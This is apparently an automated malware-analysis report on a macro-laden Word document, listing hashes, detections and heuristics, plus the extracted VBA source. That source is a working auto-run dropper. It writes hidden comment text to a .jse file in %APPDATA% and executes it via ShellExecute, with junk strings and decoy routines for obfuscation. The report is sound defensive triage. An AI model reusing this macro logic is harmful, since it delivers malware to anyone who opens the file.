Office (OOXML) malware analysis — malicious · c7ad8e8f16251ee1

MALICIOUS

Office (OOXML)

123.7 KB Created: 2019-10-27 18:57:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-05-14

MD5: 3f0a871390706bdcd8620913db8ca227 SHA-1: 68fb53b994afe04eecb8e6cea67f902c984b1c2e SHA-256: c7ad8e8f16251ee1cf256243daffbc7d460cced6658df02357d7ebe4be34e66a

240 Risk Score

Heuristics 8

ClamAV: Doc.Malware.Generickdz-9375646-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Generickdz-9375646-0
VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set hahahah = CreateObject("Shell.Application")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
env2 = Environ("APPDATA")
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- https://the.earth.li/~sgtatham/putty/latest/w32/putty.exeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	11087 bytes
SHA-256: `9cb6d3968b0980aa1a257b6cb068f04e463a6019b815dcb6528a9f89e46b2b90`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub ParaForceOneLine() Dim objPara As Paragraph Const ChangeSize = 0.5 For Each objPara In ActiveDocument.Paragraphs With objPara.Range While .Information(wdFirstCharacterLineNumber) <> _ .Characters(Len(.Text)).Information(wdFirstCharacterLineNumber) Wend End With Next objPara End Sub Private Function notSrc() As String Dim tableRng As Range Set tableRng = ActiveDocument.Comments(1).Range tableRng.TextRetrievalMode.IncludeHiddenText = True Dim scr As String scr = tableRng.Text notSrc = scr End Function Sub FindBullet() Dim rngTarget As Word.Range Dim oPara As Word.Paragraph Set rngTarget = Selection.Range With rngTarget Call .Collapse(wdCollapseEnd) .End = ActiveDocument.Range.End Dim t13rM228E As String t13rM228E = "love load change ought horse is exist year spirit vessels silk before carry wonder probably job surface load pour biggest warn brass discover dot aboard deeply green rays stems door partly surface shoe vast except morning dangerous became children magic melted find same dust yet guide doctor nobody spend roar quite apartment mathematics cool furniture mine find army origin syllable television further ready milk large needle poetry minute action exchange fish born bright jungle sit carry chicken shelf world pipe also kind die frame measure pan bridge company fuel cream stranger softly differ poor concerned driven zero parts problem feathers talk nearest struck poor nature before" For Each oPara In .Paragraphs If oPara.Range.ListFormat.ListType = _ WdListType.wdListBullet Then oPara.Range.Select Exit For End If Next End With End Sub Private Function env2() As String env2 = Environ("APPDATA") Dim b1ns8A146IP As String b1ns8A146IP = "born everywhere lot fat rose vertical potatoes cotton knife properly parallel worker aboard nice major basis highest receive level began frame feathers carry second mouse good written long shall too plane replied eye energy hospital frequently walk salt fence animal slide chemical yet donkey correct entire magnet temperature sheep quiet him season unless explanation became related lift owner will principle slope wolf above chest year off old eight once orbit were different room deeply purpose one care become noted material breathe explore copy whatever obtain extra biggest collect enjoy characteristic tape sink rest nobody along twice manner held low swing worry force its lady television rising molecular human not support careful sets known now chain final been within" End Function Private Function nmae() As String Dim name As String name = Rnd Dim H76Y3PP1 As String H76Y3PP1 = "pen discovery weight process solve did pan skin stems definition improve rock proud look tongue continued driver sit in lose art numeral pole shinning warn fed shade arrive wood life seed work offer sight valley relationship they coffee ground throat business stay rhyme those musical pool use funny funny wagon minute fog can thirty jack driven perhaps twelve animal share battle had learn whistle shirt missing heart why giving verb load walk sometime further went throw draw oldest arrive education instead present sheep price did principle does railroad herd clear give bent outer final beat start two variety fuel itself affect sharp although note war folks" name = "\\" & name & ".jse" nmae = name End Function Sub WordFrequency() Dim SingleWord As String 'Raw word pulled from doc Const maxwords = 9000 'Maximum unique words allowed Dim Words(maxwords) As String 'Array to hold unique words Dim Freq(maxwords) As Integer 'Frequency counter for unique words Dim WordNum As Integer 'Number of unique words Dim ByFreq As Boolean 'Flag for sorting order Dim ttlwds As Long 'Total words in the document Dim Excludes As String 'Words to be excluded Dim Found As Boolean 'Temporary flag Dim j As Integer 'Temporary variables Dim k As Integer ' Dim l As Integer ' Dim Temp As Integer ' Dim tword As String ' ' Set up excluded words Excludes = "[the][a][of][is][to][for][this][that][by][be][and][are]" ' Find out how to sort ByFreq = True ans = InputBox$("Sort by WORD or by FREQ?", "Sort order", "WORD") If ans = "" Then End If UCase(ans) = "WORD" Then ByFreq = False End If Dim kjKE6q40w2d As String kjKE6q40w2d = "worry page scared cattle mountain enter mine rubbed needs order from so either youth zero people grabbed independent bean consonant construction pressure dinner religious piano monkey us truck unless discussion gentle knowledge amount spend change man hat ring nor vowel dress equipment supper motor ancient giant able seat trade slope fully feathers noon trick pond yes came police fight cowboy carbon range dry right watch driver riding trap higher master bark noun wave dozen duty might snow refused effort differ fifty pleasure is create dug wooden cave excited donkey carbon curve mostly boy include birth dug volume store jungle worker camera gently coat deeply mountain walk handsome society cow" Selection.HomeKey Unit:=wdStory System.Cursor = wdCursorWait WordNum = 0 ttlwds = ActiveDocument.Words.Count ' Control the repeat For Each aword In ActiveDocument.Words SingleWord = Trim(LCase(aword)) If SingleWord < "a" Or SingleWord > "z" Then SingleWord = "" 'Out of range? If InStr(Excludes, "[" & SingleWord & "]") Then SingleWord = "" 'On exclude list? If Len(SingleWord) > 0 Then Found = False For j = 1 To WordNum If Words(j) = SingleWord Then Freq(j) = Freq(j) + 1 Found = True Exit For End If Next j If Not Found Then WordNum = WordNum + 1 Words(WordNum) = SingleWord Freq(WordNum) = 1 End If If WordNum > maxwords - 1 Then Exit For End If End If ttlwds = ttlwds - 1 StatusBar = "Remaining: " & ttlwds & " Unique: " & WordNum Next aword ' Now sort it into word order For j = 1 To WordNum - 1 k = j For l = j + 1 To WordNum Next l If k <> j Then tword = Words(j) Words(j) = Words(k) Words(k) = tword Temp = Freq(j) Freq(j) = Freq(k) Freq(k) = Temp End If StatusBar = "Sorting: " & WordNum - j Next j Dim qR4U8q5w3M As String qR4U8q5w3M = "sell once traffic built heart laid proper piece folks own studied fat see speech she farther attempt angry new principle ever satellites needed equator science religious buried ants represent fun ranch some electricity fell cookies birthday coffee drove slightly pen balloon sugar what twice cabin small what stock split hurry see thou closer afternoon with mouth end roll fat yesterday fire quickly motion flower on swung beauty closer bet tales principal once season pond ask selection breeze yes shot one clear winter snow declared teach idea night seen imagine invented harder master central newspaper surprise piano fat recently union town success bee" ' Now write out the results tmpName = ActiveDocument.AttachedTemplate.FullName Documents.Add Template:=tmpName, NewTemplate:=False Selection.ParagraphFormat.TabStops.ClearAll With Selection For j = 1 To WordNum .TypeText Text:=Trim(Str(Freq(j))) & vbTab & Words(j) & vbCrLf Next j End With System.Cursor = wdCursorNormal j = MsgBox("There were " & Trim(Str(WordNum)) & _ " different words ", vbOKOnly, "Finished") End Sub Private Sub Document_Open() Dim jora As String jora = env2 & nmae Open jora For Output As #5 Print #5, notSrc Dim I06k185T3 As String I06k185T3 = "silence glass stomach football central sink nation plane straw after south trap kitchen heard anyone about terrible avoid cattle congress labor shaking chief gun balloon tip anywhere mix enter church earn possibly flow physical herself ourselves ball weigh motion foot flat third impossible fierce home article behavior lucky baseball space feature except claws whole actually direction however noun moving coal dead victory fastened aware went dry drawn everything find dark origin nuts rapidly jar spring pool next crowd swam zoo film gas ship elephant up although tried afternoon body relationship run possibly fighting explain bee language magnet too discovery crew writing gun sing lose loose liquid story having business excited youth finger addition speak are four standard attention" Close #5 Dim sOQ549GFgA5A As Long sOQ549GFgA5A = 2534439 Dim id1EN98i37 As Long id1EN98i37 = 681681 Set hahahah = CreateObject("Shell.Application") Dim T1Pd49 As Boolean T1Pd49 = True Dim Qn4Xb69 As Boolean Qn4Xb69 = True hahahah.ShellExecute (jora) Dim ik996 As String ik996 = "teacher smaller continued cast truth has village nearby gone naturally question valley original opportunity hit death slope breeze birthday finger explanation article development shine mirror shadow reader truth song somehow torn ill sing pink sang planet nearest satisfied hunt this central appropriate evidence having over back forget crop bark climate silence drop discuss come heat birthday second become continued explore circus globe simply noon tip fellow told carbon wheat natural length term sense ate attack upon chosen or human travel truck river sea ear program fastened why bag vertical pay flies find short drive of official affect hard underline motion fifty blew dull wife large through blind somewhere evening shadow once ruler child camera giant smile key" Set hahahah = Nothing End Sub Attribute VB_Name = "NewMacros" Sub p() End Sub Attribute VB_Name = "notForm" Attribute VB_Base = "0{C8A51FBA-5900-47E3-803E-93996E4E8A9F}{D7FF62B5-E467-4EEB-878A-7F0C619909D3}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	107520 bytes
SHA-256: `69aeddf6b86a1e3cf628a120940ce847f7ea770305d4ea165e31a01360456d22`
Detection ClamAV: Doc.Malware.Generickdz-9375646-0 Obfuscation or payload: likely Carved artifact contains 21 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.